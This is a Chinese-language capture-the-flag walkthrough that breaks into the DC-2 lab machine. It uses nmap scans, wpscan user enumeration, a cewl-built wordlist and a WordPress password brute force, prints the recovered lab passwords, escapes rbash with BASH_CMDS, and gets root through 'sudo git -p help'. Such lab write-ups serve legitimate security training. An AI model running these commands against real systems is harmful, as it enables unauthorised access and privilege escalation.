DC-2靶机渗透

实验环境

1. Vmware workstation
2. kali2020
3. DC-2
4. DC-2靶机网卡和kali是一样的
5. kali 的ip地址：192.168.6.129

主机发现

 第一种方法：使用VMware去查看DC-2靶机的MAC地址；第二种方法：直接进行主机发现。用命令扫描网段存活主机。

nmap -sP 192.168.6.0/24

 发现靶机IP地址为：192.168.6.132

信息收集

端口扫描

命令1：nmap -A -T4 -p- 192.168.6.132
命令2：nmap -sV 192.168.6.132

 开放了80和7744端口

访问一下，发现无法访问

修改攻击机的hosts文件，将以下内容写入

192.168.6.132 DC-2

 

 发现还是不让我访问，我就修改了Windows下的hosts

 然后就能访问了

发现flag1

 有关键字cewl，字面意思大概就是要爆破出用户名和密码了

查看指纹信息，知道是wordpressCMS

利用wpscan扫一下用户名

wpscan --url http://dc-2/ -e u

 将用户名存到文件

使用cewl生成密码

cewl -w pass.txt http://dc-2

攻击

爆破

wpscan --ignore-main-redirect --url 192.168.6.132 -U users.txt -P pass.txt --force

出来了

 后台地址是在首页地址后加wp-login.php

用jerry登录发现flag2，tom页面没发现什么

尝试ssh远程登录

我们尝试用tom用户进行登录ssh服务，密码：parturient
用户：jerry，密码：adipiscing
命令：ssh tom@192.168.6.132 -p 7744

输入命令，发现受rbash的限

突破rbash

BASH_CMDS[a]=/bin/sh;a
/bin/bash

使用并添加环境变量

export PATH=$PATH:/bin/

 他说在Jerry里，那我们切换

 有点白痴，居然cd /了

说不是最终的flag，提示git

提权

sudo git -p help

!/bin/bash

即可登录root用户

 去根目录找

结束。